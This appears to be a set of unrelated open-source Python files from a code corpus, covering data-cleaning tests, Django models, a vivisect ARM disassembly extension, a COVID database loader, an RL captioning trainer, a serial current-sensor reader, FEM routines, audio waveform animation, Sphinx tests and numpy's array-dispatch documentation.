check_file(pathlib.Path(fname))
def test_split_microscopic_to_reactor_len():
length = 4
micro_path = check_file('microscopic_data.csv')
data = read_data(micro_path)
data_microscopic = split_microscopic_to_reactor(data)
assert len(data_microscopic) == length
def test_split_microscopic_to_reactor_column_name():
column_names = [
"date",
"ameoba_arcella",
"ameoba_nude ameba",
"crawling ciliates_aspidisca",
"crawling ciliates_trachelopylum",
"free swimming ciliates_lionutus",
"free swimming ciliates_paramecium",
"stalked ciliate_epistylis",
"stalked ciliate_vorticella",
"stalked ciliate_carchecium",
"stalked ciliate_tokophyra",
"stalked ciliate_podophyra",
"stalked ciliate_opercularia",
"rotifer_rotifer",
"worms_nematode",
"flagellates_peranema trich",
"flagellates_micro flagellates",
"worms_worms",
"spirochaetes_spirochaetes",
"Total Count- amoeba",
"Total Count- Crawling Ciliates",
"Total Count- Free swimming Ciliates",
"Total Count- Stalked Ciliates",
"Total Count- Rotifers",
"Total Count- Worms",
"Total Count- Spirochaetes",
"Total Count- Flagellats",
"Total Count- Filaments",
"Filaments_Nocardia_index",
"Filaments_Microthrix_index",
"Filaments_N. Limicola_index",
"Filaments_Thiothrix_index",
"Filaments_0041/0675_index",
"Filaments_0092_index",
"Filaments_1851_index",
"Filaments_beggiatoa_index",
"Filaments_zoogloea_index",
]
micro_path = check_file('microscopic_data.csv')
data = read_data(micro_path)
data_microscopic = split_microscopic_to_reactor(data)
assert list(data_microscopic[0].columns) == column_names
def test_split_svi_to_reactor_column_names():
columns_names = ['date', 'Settling_velocity', 'SVI']
svi_path = check_file('SVI.csv')
data = read_data(svi_path)
data_svi_computed = cds.svi_calculate(data)
data_svi = split_svi_to_reactor(data_svi_computed)
assert list(data_svi[0].columns) == columns_names
def test_split_svi_to_reactor_len():
length = 4
svi_path = check_file('SVI.csv')
data = read_data(svi_path)
data_svi_computed = cds.svi_calculate(data)
data_svi = split_svi_to_reactor(data_svi_computed)
assert len(data_svi) == length
def test_clean_table_SVI_dates():
"Check that every row is a day and there are no gaps"
days_list= []
length_list = []
for i in range(4):
svi_path = check_file(f"clean_tables/svi_{i+1}.csv")
data = pd.read_csv(svi_path)
data["date"] = pd.to_datetime(data["date"], dayfirst=True)
df = data["date"]
length_list.append(len(df))
days = df.diff().sum().days
days_list.append(days+1)
assert days_list == length_list
def test_clean_table_temperature_dates():
"Check that every row is a day and there are no gaps"
days_list= []
length_list = []
temp_path = check_file(f"clean_tables/temperatur.csv")
data = pd.read_csv(temp_path)
data["Date"] = pd.to_datetime(data["Date"], dayfirst=True)
df = data["Date"]
length = len(df)
days = df.diff().sum().days
assert days +1 == length | 2.46875 | 2 |
address/models.py | wendell1101/EcommerceProject---Django | 0 | 12786799 | <gh_stars>0
from django.db import models
from customer_profiles.models import CustomerProfile
from django_countries.fields import CountryField
class BillingAddress(models.Model):
customer_profile = models.ForeignKey(CustomerProfile, on_delete=models.CASCADE)
house_number = models.CharField(max_length=120)
street = models.CharField(max_length=200)
barangay = models.CharField(max_length=200)
city = models.CharField(max_length=200)
province = models.CharField(max_length=200)
zip_code = models.CharField(max_length=200)
country = CountryField(blank_label='(select country)')
timestamp = models.DateTimeField(auto_now_add=True, blank=True)
def __str__(self):
return self.customer_profile.user.email
def get_full_address(self):
return f'{self.house_number}, {self.street}, {self.barangay}, {self.city} city, {self.province}, {self.country}'
class ShippingAddress(models.Model):
customer_profile = models.ForeignKey(CustomerProfile, on_delete=models.CASCADE)
house_number = models.CharField(max_length=120)
street = models.CharField(max_length=200)
barangay = models.CharField(max_length=200)
city = models.CharField(max_length=200)
province = models.CharField(max_length=200)
zip_code = models.CharField(max_length=200)
country = CountryField(blank_label='(select country)')
timestamp = models.DateTimeField(auto_now_add=True, blank=True)
def __str__(self):
return self.customer_profile.user.email
def get_full_address(self):
return f'{self.house_number}, {self.street}, {self.barangay}, {self.city} city, {self.province}, {self.country}'
class DefaultAddress(models.Model):
customer_profile = models.ForeignKey(CustomerProfile, on_delete=models.CASCADE)
house_number = models.CharField(max_length=120)
street = models.CharField(max_length=200)
barangay = models.CharField(max_length=200)
city = models.CharField(max_length=200)
province = models.CharField(max_length=200)
zip_code = models.CharField(max_length=200)
country = CountryField(blank_label='(select country)')
timestamp = models.DateTimeField(auto_now_add=True, blank=True)
def __str__(self):
return self.customer_profile.user.email
def get_full_address(self):
return f'{self.house_number}, {self.street}, {self.barangay}, {self.city} city, {self.province}, {self.country}' | 2.203125 | 2 |
src/bot/gameobservers/tests/test_game_end_observers.py | malmgrens4/TwIOTch | 0 | 12786800 | import pytest
from unittest import mock
from unittest.mock import AsyncMock, MagicMock
from src.bot.gameobservers.WinGameChatObserver import WinGameChatObserver
class TestNumberGameObservers:
@pytest.mark.asyncio
async def test_win_chat_announce_winners(self):
"""tests winning messages are called when the game is over"""
mock_subject = AsyncMock()
mock_subject.won = True
mock_subject.winning_team_id = 1
team_one = "Team 1"
team_names = ["User 1", "User 2"]
mock_subject.team_data = MagicMock()
mock_subject.team_data.get_team_member_map = MagicMock()
mock_subject.team_data.get_team_member_map.return_value = {1: ['id1', 'id2']}
winGameChatObserver = WinGameChatObserver()
winGameChatObserver.get_team_name = MagicMock()
winGameChatObserver.get_team_name.return_value = team_one
winGameChatObserver.get_usernames = MagicMock()
winGameChatObserver.get_usernames.return_value = team_names
await winGameChatObserver.update(mock_subject)
mock_subject.send_message.assert_called()
| 2.59375 | 3 |
vdb/extensions/arm.py | wisdark/vivisect | 716 | 12786801 | <reponame>wisdark/vivisect<gh_stars>100-1000
import envi
import envi.cli as e_cli
import envi.common as e_common
import envi.archs.arm.regs as e_arm_regs
import envi.archs.arm.disasm as e_arm
import envi.archs.thumb16.disasm as e_thumb
def armdis(db, line):
'''
Disassemble arm instructions from the given address.
Usage: armdis <addr_exp>
'''
disasmobj = e_arm.ArmDisasm()
    armthumbdis(db, line, disasmobj)
def thumbdis(db, line):
'''
Disassemble thumb instructions from the given address.
Usage: thumbdis <addr_exp>
'''
disasmobj = e_thumb.ThumbDisasm()
    armthumbdis(db, line, disasmobj)
def armthumbdis(db, line, disasmobj):
'''
    Core of disassembly, for code reuse. The only difference is the object actually
doing the disassembly.
'''
t = db.getTrace()
argv = e_cli.splitargs(line)
size = 20
argc = len(argv)
if argc == 0:
addr = t.getProgramCounter()
else:
addr = t.parseExpression(argv[0])
if argc > 1:
size = t.parseExpression(argv[1])
bytez = t.readMemory(addr, size)
offset = 0
db.vprint("Dissassembly:")
while offset < size:
va = addr + offset
op = disasmobj.disasm(bytez, offset, va)
obytez = bytez[offset:offset+len(op)]
db.canvas.addVaText('0x%.8x' % va, va=va)
db.canvas.addText(": %s " % e_common.hexify(obytez).ljust(17))
op.render(db.canvas)
db.canvas.addText("\n")
offset += len(op)
def togglethumb(db, line):
'''
Toggle Thumb Mode
'''
t = db.getTrace()
cur_t = t.getRegister(e_arm_regs.REG_T)
new_t = not cur_t
arch = (envi.ARCH_ARMV7, envi.ARCH_THUMB)[new_t]
t.setRegister(e_arm_regs.REG_T, new_t)
db.canvas.addText("Toggled Thumb Mode: %r\n" % new_t)
def vdbExtension(vdb, trace):
vdb.addCmdAlias('db', 'mem -F bytes')
vdb.addCmdAlias('dw', 'mem -F u_int_16')
vdb.addCmdAlias('dd', 'mem -F u_int_32')
vdb.addCmdAlias('dq', 'mem -F u_int_64')
vdb.addCmdAlias('dr', 'mem -F "Deref View"')
vdb.addCmdAlias('ds', 'mem -F "Symbols View"')
vdb.registerCmdExtension(armdis)
vdb.registerCmdExtension(thumbdis)
vdb.registerCmdExtension(togglethumb)
| 2.390625 | 2 |
LeetCode/Python3/TwoPointers/86. Partition List.py | WatsonWangZh/CodingPractice | 11 | 12786802 | <gh_stars>10-100
# Given a linked list and a value x, partition it such that all nodes less than x come before nodes greater than or equal to x.
# You should preserve the original relative order of the nodes in each of the two partitions.
# Example:
# Input: head = 1->4->3->2->5->2, x = 3
# Output: 1->2->2->4->3->5
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
class Solution(object):
def partition(self, head, x):
"""
:type head: ListNode
:type x: int
:rtype: ListNode
"""
        # M1. Simulation
        # First advance to the position just before the first node whose value is >= x,
        # then keep scanning: every node smaller than x is unlinked and re-inserted
        # at that position, preserving the relative order.
dummy = ListNode(0)
dummy.next = head
pre, cur = dummy, head
while pre.next and pre.next.val < x:
pre = pre.next
cur = pre
while cur.next:
if cur.next.val < x:
tmp = cur.next
cur.next = tmp.next
tmp.next = pre.next
pre.next = tmp
pre = pre.next
else:
cur = cur.next
return dummy.next
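        # Note: the alternative below (M2) is unreachable because of the return above;
        # it is kept only for reference.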
        # M2. Partition and merge
        # Split nodes smaller than x and nodes >= x into two lists, keeping their
        # original relative order, then concatenate the two lists and return the result.
small_dummy, big_dummy = ListNode(0), ListNode(0)
small_cur, big_cur = small_dummy, big_dummy
while head:
if head.val < x:
small_cur.next = head
small_cur = head
else:
big_cur.next = head
big_cur = head
head = head.next
big_cur.next = None
small_cur.next = big_dummy.next
return small_dummy.next | 3.625 | 4 |
src/Filler.py | DjamelALI/covid-19-database | 0 | 12786803 | from . import Config, DIR_NAME
from .csv_tool import *
from .print_func import print_head
from .TemplateDir import TemplateDir, TEMPLATES_DIR
DIR_INSERT = TEMPLATES_DIR / "insert"
class Filler:
def __init__(self, config: Config):
self.config = config
self.template_dir = TemplateDir(DIR_INSERT)
@property
def psql(self):
return self.config.psql
@property
def path_data_source(self):
return self.config.path_data_source
def fill_sexe(self):
print("Remplissage de la table Sexe")
template = self.template_dir.get_template("sexe")
self.psql.execute_template(template)
def exec_template_file(self, name):
TemplateDir(DIR_INSERT / name).exec_all_file(self.psql)
def __fill_csv_simple(self, path, table, **kwargs):
print(f"Remplissage de la table {table} "
f"avec le fichier [{path}]")
with open(path, 'r') as f:
# skip header
next(f)
self.psql.copy(f, table, **kwargs)
def __fill_csv_apply_func(self, path: str, table: str,
info: tuple, sep=","):
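        # `info` is a sequence of (column_name, converter) pairs (see info_age_reg
        # below); each converter maps a raw CSV field to a SQL literal string, and a
        # single multi-row INSERT statement is built from the converted values.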
columns = [x[0] for x in info]
funcs = [x[1] for x in info]
print(f"Remplissage de la table {table} "
f"avec le fichier [{path}]")
with open(path, 'r') as f:
# skip header
next(f)
values = []
for line in f.readlines():
line = tuple([f(l) for l, f in zip(line.split(sep), funcs)])
assert len(line) == len(funcs), f"{len(line)} != {len(funcs)}"
values.append(f"({', '.join(line)})")
values_str = ",\n".join(values)
request = f"INSERT INTO {table} ({','.join(columns)}) VALUES\n" \
f"{values_str};"
self.psql.execute(command=request)
def __recent_file_dir(self, name: str):
files = (self.path_data_source / DIR_NAME[name]).iterdir()
return max(files)
@property
def path_region(self):
return self.path_data_source / "regions-france.csv"
def fill_region(self):
self.__fill_csv_simple(self.path_region, "Region")
@property
def path_departement(self):
return self.path_data_source / "departements-france.csv"
def fill_departement(self):
self.exec_template_file("departement")
self.__fill_csv_simple(self.path_departement, "tempDepartement")
@property
def path_age_reg(self):
return self.__recent_file_dir("age")
@property
def info_age_reg(self):
return (("numReg", str_to_int),
("clAge90", str_to_int),
("jour", to_date),
("hospAge", to_int),
("reaAge", to_int),
("hospConvAge", int_or_null),
("ssrUsldAge", int_or_null),
("autreAge", int_or_null),
("radAge", to_int),
("dcAge", to_int))
def fill_age_reg(self, file_path=None):
if file_path is None:
file_path = self.path_age_reg
self.__fill_csv_apply_func(file_path,
table="AgesReg",
info=self.info_age_reg,
sep=";")
@property
def path_sexe_dep(self):
return self.__recent_file_dir("sexe")
@property
def info_sexe_dep(self):
return (("numDep", str_to_str),
("idSexe", str_to_int),
("jour", str_to_date),
("hospSexe", to_str),
("reaSexe", to_int),
("hospConvSexe", int_or_null),
("ssrUsldSexe", int_or_null),
("autreSexe", int_or_null),
("radSexe", to_int),
("dcSexe", to_int))
def fill_sexe_dep(self, file_path=None):
if file_path is None:
file_path = self.path_sexe_dep
self.exec_template_file("sexeDep")
self.__fill_csv_apply_func(file_path,
table="TempSexesDep",
info=self.info_sexe_dep,
sep=";")
self.psql.execute("SELECT insert_sexeDep_from_temp();")
@property
def path_incid_dep(self):
return self.__recent_file_dir("incid_dep")
@property
def path_incid_reg(self):
return self.__recent_file_dir("incid_reg")
@property
def path_service(self):
return self.__recent_file_dir("service")
@property
def info_incid_dep(self):
return \
(
("numDep", str_to_str),
("jour", to_date),
("incidHosp", to_int),
("incidRea", to_int),
("incidDc", to_int),
("incidRad", to_int),
)
def fill_incid_dep_tmp(self, path=None):
if path is None:
path = self.path_incid_dep
self.__fill_csv_apply_func(path, "TempIncidDep",
self.info_incid_dep, sep=';')
def fill_incid_reg_tmp(self, path=None):
if path is None:
path = self.path_incid_reg
self.__fill_csv_simple(path, "TempIncidReg", sep=';')
@property
def info_service(self):
return \
(
("numDep", str_to_str),
("jour", to_date),
("nbSvce", to_int),
)
def fill_service_tmp(self, path=None):
if path is None:
path = self.path_service
self.__fill_csv_apply_func(path, "TempService",
self.info_service, sep=';')
def fill_incidence(self, incid_dep=None, incid_reg=None, service_file=None):
self.exec_template_file("incidence")
print("Remplissage de la table Incidence")
self.fill_incid_dep_tmp(incid_dep)
self.fill_incid_reg_tmp(incid_reg)
self.fill_service_tmp(service_file)
self.psql.commit()
self.psql.execute("SELECT InsertIncidence();")
def fill_all(self):
print_head("REMPLISSAGE DES TABLES")
self.fill_sexe()
self.fill_region()
self.fill_departement()
self.psql.commit()
self.fill_age_reg()
self.fill_sexe_dep()
self.fill_incidence()
self.psql.commit()
| 2.65625 | 3 |
xmodaler/engine/rl_trainer.py | YehLi/xmodaler | 830 | 12786804 | # Copyright 2021 JD.com, Inc., JD AI
"""
@author: <NAME>
@contact: <EMAIL>
"""
import time
import copy
import torch
from .defaults import DefaultTrainer
from xmodaler.scorer import build_scorer
from xmodaler.config import kfg
from xmodaler.losses import build_rl_losses
import xmodaler.utils.comm as comm
from .build import ENGINE_REGISTRY
__all__ = ['RLTrainer']
@ENGINE_REGISTRY.register()
class RLTrainer(DefaultTrainer):
def __init__(self, cfg):
super(RLTrainer, self).__init__(cfg)
self.scorer = self.build_scorer(cfg)
self.losses = build_rl_losses(cfg)
@classmethod
def build_scorer(cls, cfg):
return build_scorer(cfg)
def run_step(self):
start = time.perf_counter()
try:
data = next(self._train_data_loader_iter)
except StopIteration:
self._train_data_loader_iter = iter(self.train_data_loader)
data = next(self._train_data_loader_iter)
data_time = time.perf_counter() - start
data = comm.unwrap_model(self.model).preprocess_batch(data)
        # Baseline pass: greedy decoding without gradients; its score serves as
        # the self-critical baseline.
        self.model.eval()
        with torch.no_grad():
            bs_data = copy.copy(data)
            bs_outputs_dict = self.model(bs_data, use_beam_search=False, output_sents=False)
            bs_rewards = self.scorer(bs_outputs_dict)
        # Sampling pass: decode by sampling and reward each sample by its
        # advantage over the greedy baseline score.
        self.model.train()
        data[kfg.DECODE_BY_SAMPLE] = True
        outputs_dict = self.model(data, use_beam_search=False, output_sents=False)
        rewards = self.scorer(outputs_dict)
        rewards = torch.from_numpy(rewards[kfg.REWARDS] - bs_rewards[kfg.REWARDS]).float().cuda()
        outputs_dict.update({ kfg.REWARDS: rewards })
losses_dict = {}
for loss in self.losses:
loss_dict = loss(outputs_dict)
losses_dict.update(loss_dict)
losses = sum(losses_dict.values())
self.optimizer.zero_grad()
losses.backward()
bs_rewards.pop(kfg.REWARDS)
losses_dict.update(bs_rewards)
self._write_metrics(losses_dict, data_time)
self.optimizer.step() | 1.914063 | 2 |
utils/acs_utils.py | stephanballer/deepedgebench | 1 | 12786805 | <filename>utils/acs_utils.py
#!/usr/bin/python3
""" Circuit:
____________
| |
Uin _______________________| ACS712 5A |________ Uin device
| |____________|
_|_ | |
| | Imes |
R1 | | to A0 |
|___| |
|_________ Umes |
     _|_         to A1       |
| | |
R2 | | |
|_ _| GND |
| to AGND |
GND ________|______________|__________|__________ GND device
Arduino out: "A0 A1\n" in mV
    I = ((Imes / max_val) * 5000mV - 2500mV) / 185mV
    R1: 10kΩ R2: 2.2kΩ
U = (Umes / max_val) * 5.0V * Rfac
Rfac = (R1 + R2) / R2
"""
from serial import Serial
from time import time, sleep
res_factor = (9.93 + 1.98) / 1.98
max_val = 1023.0
tolerance = 512
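# Minimal helper sketch (not used by acs_read): the docstring conversion
# formulas as standalone functions, handy for sanity-checking raw readings.
def raw_to_voltage(raw_voltage):
    # U = (Umes / max_val) * 5.0V * Rfac
    return (raw_voltage / max_val) * 5.0 * res_factor
def raw_to_current(raw_current, zero=512.0):
    # I = ((Imes - zero) / max_val) * 5000mV / 185mV (ACS712 5A: 185 mV per A)
    return ((raw_current - zero) / max_val) * 5000.0 / 185.0
# Example: raw_to_current(550) is roughly 1.0 A, raw_to_voltage(512) roughly 15.05 V.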
def acs_read(device_path, delay=0.1, file_path=None, calibrate=-1.0, zero_val=512.0):
ser = Serial(device_path, 9600)
rec = str()
if calibrate >= 0.0:
print("Calibrating for %d seconds..." % (calibrate))
rec += ser.read().decode('utf-8', errors='ignore')
sleep(calibrate)
rec += ser.read(ser.inWaiting()).decode('utf-8', errors='ignore')
num_list = list()
for line in rec.split("\n")[1:-1]:
nums = line.split()
if len(nums) == 2:
try:
num = float(nums[0])
if num >= 0.0 and num <= max_val:
num_list.append(num)
except ValueError:
pass
if len(num_list) > 0:
zero_val = sum(num_list)/len(num_list)
else:
print('Error: no readable data received')
exit()
usr_inp = input("%.2f analog input value in relation to 1023 or %.3fV in relation to ~5V as base value. Press any key to continue or \'q\' to exit\n" % (zero_val, (zero_val/max_val) * 5.0))
if len(usr_inp) > 0 and usr_inp[0] == "q":
exit()
rec = str()
if file_path is not None:
with open(file_path, 'w') as f:
f.write('serial_data\n')
while True:
rec += ser.read().decode('utf-8', errors='ignore')
sleep(delay)
rec += ser.read(ser.inWaiting()).decode('utf-8', errors='ignore')
timestamp = time()
rec_list = rec.split('\n')
rec = rec_list[-1]
vol_list, cur_list = list(), list()
for line in rec_list[:-1]:
nums = line.split()
if len(nums) == 2:
try:
cur_num, vol_num = float(nums[0]), float(nums[1])
if cur_num >= zero_val - tolerance and cur_num <= max_val and vol_num >= 0 and vol_num <= max_val:
voltage = (vol_num / max_val) * 5.0 * res_factor
vol_list.append(voltage)
current = ((cur_num - zero_val)/max_val) * 5000.0 / 185.0
cur_list.append(current)
except ValueError:
pass
if (len(vol_list) > 0):
voltage = sum(vol_list)/len(vol_list)
current = sum(cur_list)/len(cur_list)
if file_path is not None:
with open(file_path, 'a') as f:
f.write('%f %.8f %.8f\n' % (timestamp, current, voltage))
print('\x1b[1K\r%.6fA %.6fV %.6fW' % (current, voltage, current*voltage), end='')
ser.close()
| 2.640625 | 3 |
pyPLANES/fem/elements/surfacic_elements.py | matael/pyPLANES | 0 | 12786806 | <reponame>matael/pyPLANES
#! /usr/bin/env python
# -*- coding:utf8 -*-
#
# surfacic_elements.py
#
# This file is part of pyplanes, a software distributed under the MIT license.
# For any question, please contact one of the authors cited below.
#
# Copyright (c) 2020
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
import numpy as np
import numpy.linalg as LA
def imposed_Neumann(_elem):
coord_e = _elem.get_coordinates()
K_ref = _elem.reference_element
n, m = K_ref.Phi.shape
F = np.zeros(n)
for ipg in range(m):
_Phi = K_ref.Phi[:, ipg].reshape(n)
F += K_ref.w[ipg]*_Phi
F *= LA.norm(coord_e[:, 1]-coord_e[:, 0])/2.
return F
def imposed_pw_elementary_vector(_elem, k):
''' Calculus of I = int_{\Omega_e} e^{-jkx} Phi(x) dx
On the reference element:
I = (h/2)e^{-jkx-mid} * \int_{-1}^{1} e^{-jkhxi/2} \Phi(xi) dxi
'''
# Geometrical datas
coord_e = _elem.get_coordinates()
h = LA.norm(coord_e[:, 1]-coord_e[:, 0])
x_mid = min(coord_e[0, :]) + h/2.
k_prime = k*h/2.
F_analytical = _elem.reference_element.int_lobatto_exponential(k_prime)
return (h/2.)*np.exp(-1j*k*x_mid)*F_analytical
def fsi_elementary_matrix(_elem):
coord_e = _elem.get_coordinates()
K_ref = _elem.reference_element
n, m = K_ref.Phi.shape
M = np.zeros((n, n))
for ipg in range(m):
_Phi = K_ref.Phi[:, ipg].reshape(n)
M += K_ref.w[ipg]*np.dot(_Phi.reshape((n, 1)), _Phi.reshape((1, n)))
M *= LA.norm(coord_e[:, 1]-coord_e[:, 0])/2.
return M | 2.171875 | 2 |
QuantitativeEditing/audio_rendering.py | wjs018/QuantitativeEditing | 21 | 12786807 | <reponame>wjs018/QuantitativeEditing
import librosa
import matplotlib.pyplot as plt
import numpy as np
from moviepy.editor import *
from librosa.display import waveplot
from moviepy.video.io.bindings import mplfig_to_npimage
last_t = 0
tempgraph = []
def animate_audio(video, audio, output):
"""
Renders a waveform of a video's audio and progresses it every 0.5s as the
video plays.
Parameters
-----------
video
filepath to a video that has audio
audio
filepath to save the extracted audio from video as an .mp3
output
filepath to save the animated audio to as a .mp4
Returns
--------
output
Simply returns the filepath to the saved output video
"""
global last_t
global tempgraph
# Load video and extract audio to file
video_file = VideoFileClip(video)
extracted_audio = video_file.audio
extracted_audio.write_audiofile(audio)
# Load the saved audio into librosa
y, sr = librosa.load(audio, mono=False)
# Make a waveplot figure
fig, ax = plt.subplots(1, figsize=(12, 2), facecolor='white')
waveplot(y, sr=sr, color='b', alpha=0.25)
# Initialize some variables
last_t = 0
tempgraph = mplfig_to_npimage(fig)
# Function to animate our graph
def animate(t):
# Access our initialized variables from outside the function
global last_t
global tempgraph
# Round time to nearest 0.5 second. This limits the number of times we
# update the graph. Each graph update costs 10-20 seconds to draw, so by
# limiting this, we can render the graph an order of magnitude faster
temp_t = np.round(t * 2) / 2.0
# Only update the graph if we are at the next 0.5 seconds
if t > 0 and temp_t != last_t:
# Update our timekeeping variable
last_t = temp_t
# Delete the previous graph, otherwise we will keep plotting over
# the same graphs again and again
for coll in (ax.collections):
ax.collections.remove(coll)
# Load only the played portion of the mp3 and plot them
            y2, sr2 = librosa.load(audio, mono=False, duration=t)
waveplot(y2, sr=sr2, color='b', alpha=0.8)
waveplot(y, sr=sr, color='b', alpha=0.25)
# Update the output graph
tempgraph = mplfig_to_npimage(fig)
return tempgraph
# Make a video of the animated graph and save it
animation1 = VideoClip(animate, duration=video_file.duration)
animation1.write_videofile(output, fps=video_file.fps)
return output
if __name__ == '__main__':
# Import source video and extract the audio to an mp3
video = VideoFileClip('BTS_2017_DNA.mkv')
audio = video.audio
audio.write_audiofile('extracted_audio.mp3')
# Load the mp3 into librosa
y, sr = librosa.load('extracted_audio.mp3', mono=False)
# Make a waveplot figure
fig, ax = plt.subplots(1, figsize=(12, 2), facecolor='white')
waveplot(y, sr=sr, color='b', alpha=0.25)
# Initialize some variables
last_t = 0
tempgraph = mplfig_to_npimage(fig)
# Function to animate our graph
def animate1(t):
# Access our initialized variables from outside the function
global last_t
global tempgraph
# Round time to nearest 0.5 second. This limits the number of times we
# update the graph. Each graph update costs 10-20 seconds to draw, so by
# limiting this, we can render the graph an order of magnitude faster
temp_t = np.round(t * 2) / 2.0
# Only update the graph if we are at the next 0.5 seconds
if t > 0 and temp_t != last_t:
# Update our timekeeping variable
last_t = temp_t
# Delete the previous graph, otherwise we will keep plotting over
# the same graphs again and again
for coll in (ax.collections):
ax.collections.remove(coll)
# Load only the played portion of the mp3 and plot them
y2, sr2 = librosa.load('extracted_audio.mp3', mono=False,
duration=t)
waveplot(y2, sr=sr2, color='b', alpha=0.8)
waveplot(y, sr=sr, color='b', alpha=0.25)
# Update the output graph
tempgraph = mplfig_to_npimage(fig)
return tempgraph
# Make a video of the animated graph and save it
animation1 = VideoClip(animate1, duration=video.duration)
animation1.write_videofile('audio_animation1.mp4', fps=video.fps)
| 3.328125 | 3 |
tests/test_duplicated_link.py | mhbl3/matlabdomain | 38 | 12786808 | <reponame>mhbl3/matlabdomain<filename>tests/test_duplicated_link.py<gh_stars>10-100
# -*- coding: utf-8 -*-
"""
test_package_links.py
~~~~~~~~~~~~
Test the autodoc extension.
:copyright: Copyright 2007-2018 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from __future__ import unicode_literals
import pickle
import os
import sys
import docutils
import pytest
from sphinx import addnodes
from sphinx import version_info
from sphinx.testing.fixtures import test_params, make_app
from sphinx.testing.path import path
@pytest.fixture(scope='module')
def rootdir():
return path(os.path.dirname(__file__)).abspath()
@pytest.mark.skipif(sys.version_info < (3, 6), reason="requires python3.6 or higher")
def test_with_prefix(make_app, rootdir):
srcdir = rootdir / 'roots' / 'test_duplicate_link'
app = make_app(srcdir=srcdir)
app.builder.build_all()
content = pickle.loads((app.doctreedir / 'groups.doctree').read_bytes())
assert isinstance(content[0], docutils.nodes.section)
section = content[0][7]
assert section.astext() == 'NiceFiniteGroup\n\n\n\nclass +replab.NiceFiniteGroup\n\nBases: +replab.FiniteGroup\n\nA nice finite group is a finite group equipped with an injective homomorphism into a permutation group\n\nReference that triggers the error: eqv'
@pytest.mark.skipif(sys.version_info < (3, 6), reason="requires python3.6 or higher")
def test_without_prefix(make_app, rootdir):
srcdir = rootdir / 'roots' / 'test_duplicate_link'
confdict = { 'matlab_keep_package_prefix' : False }
app = make_app(srcdir=srcdir, confoverrides=confdict)
app.builder.build_all()
content = pickle.loads((app.doctreedir / 'groups.doctree').read_bytes())
assert isinstance(content[0], docutils.nodes.section)
section = content[0][7]
assert section.astext() == 'NiceFiniteGroup\n\n\n\nclass replab.NiceFiniteGroup\n\nBases: replab.FiniteGroup\n\nA nice finite group is a finite group equipped with an injective homomorphism into a permutation group\n\nReference that triggers the error: eqv'
if __name__ == '__main__':
pytest.main([__file__]) | 1.820313 | 2 |
numpy/doc/dispatch.py | Soniyanayak51/numpy | 1 | 12786809 | <reponame>Soniyanayak51/numpy
""".. _dispatch_mechanism:
Numpy's dispatch mechanism, introduced in numpy version v1.16 is the
recommended approach for writing custom N-dimensional array containers that are
compatible with the numpy API and provide custom implementations of numpy
functionality. Applications include `dask <http://dask.pydata.org>`_ arrays, an
N-dimensional array distributed across multiple nodes, and `cupy
<https://docs-cupy.chainer.org/en/stable/>`_ arrays, an N-dimensional array on
a GPU.
To get a feel for writing custom array containers, we'll begin with a simple
example that has rather narrow utility but illustrates the concepts involved.
>>> import numpy as np
>>> class DiagonalArray:
... def __init__(self, N, value):
... self._N = N
... self._i = value
... def __repr__(self):
... return f"{self.__class__.__name__}(N={self._N}, value={self._i})"
... def __array__(self):
... return self._i * np.eye(self._N)
...
Our custom array can be instantiated like:
>>> arr = DiagonalArray(5, 1)
>>> arr
DiagonalArray(N=5, value=1)
We can convert to a numpy array using :func:`numpy.array` or
:func:`numpy.asarray`, which will call its ``__array__`` method to obtain a
standard ``numpy.ndarray``.
>>> np.asarray(arr)
array([[1., 0., 0., 0., 0.],
[0., 1., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 0., 0., 1., 0.],
[0., 0., 0., 0., 1.]])
If we operate on ``arr`` with a numpy function, numpy will again use the
``__array__`` interface to convert it to an array and then apply the function
in the usual way.
>>> np.multiply(arr, 2)
array([[2., 0., 0., 0., 0.],
[0., 2., 0., 0., 0.],
[0., 0., 2., 0., 0.],
[0., 0., 0., 2., 0.],
[0., 0., 0., 0., 2.]])
Notice that the return type is a standard ``numpy.ndarray``.
>>> type(np.multiply(arr, 2))
numpy.ndarray
How can we pass our custom array type through this function? Numpy allows a
class to indicate that it would like to handle computations in a custom-defined
way through the interfaces ``__array_ufunc__`` and ``__array_function__``. Let's
take them one at a time, starting with ``__array_ufunc__``. This method covers
:ref:`ufuncs`, a class of functions that includes, for example,
:func:`numpy.multiply` and :func:`numpy.sin`.
The ``__array_ufunc__`` receives:
- ``ufunc``, a function like ``numpy.multiply``
- ``method``, a string, differentiating between ``numpy.multiply(...)`` and
variants like ``numpy.multiply.outer``, ``numpy.multiply.accumulate``, and so
on. For the common case, ``numpy.multiply(...)``, ``method == '__call__'``.
- ``inputs``, which could be a mixture of different types
- ``kwargs``, keyword arguments passed to the function
For this example we will only handle the method ``__call__``.
>>> from numbers import Number
>>> class DiagonalArray:
... def __init__(self, N, value):
... self._N = N
... self._i = value
... def __repr__(self):
... return f"{self.__class__.__name__}(N={self._N}, value={self._i})"
... def __array__(self):
... return self._i * np.eye(self._N)
... def __array_ufunc__(self, ufunc, method, *inputs, **kwargs):
... if method == '__call__':
... N = None
... scalars = []
... for input in inputs:
... if isinstance(input, Number):
... scalars.append(input)
... elif isinstance(input, self.__class__):
... scalars.append(input._i)
... if N is not None:
... if N != self._N:
... raise TypeError("inconsistent sizes")
... else:
... N = self._N
... else:
... return NotImplemented
... return self.__class__(N, ufunc(*scalars, **kwargs))
... else:
... return NotImplemented
...
Now our custom array type passes through numpy functions.
>>> arr = DiagonalArray(5, 1)
>>> np.multiply(arr, 3)
DiagonalArray(N=5, value=3)
>>> np.add(arr, 3)
DiagonalArray(N=5, value=4)
>>> np.sin(arr)
DiagonalArray(N=5, value=0.8414709848078965)
At this point ``arr + 3`` does not work.
>>> arr + 3
TypeError: unsupported operand type(s) for +: 'DiagonalArray' and 'int'
To support it, we need to define the Python interfaces ``__add__``, ``__lt__``,
and so on to dispatch to the corresponding ufunc. We can achieve this
conveniently by inheriting from the mixin
:class:`~numpy.lib.mixins.NDArrayOperatorsMixin`.
>>> import numpy.lib.mixins
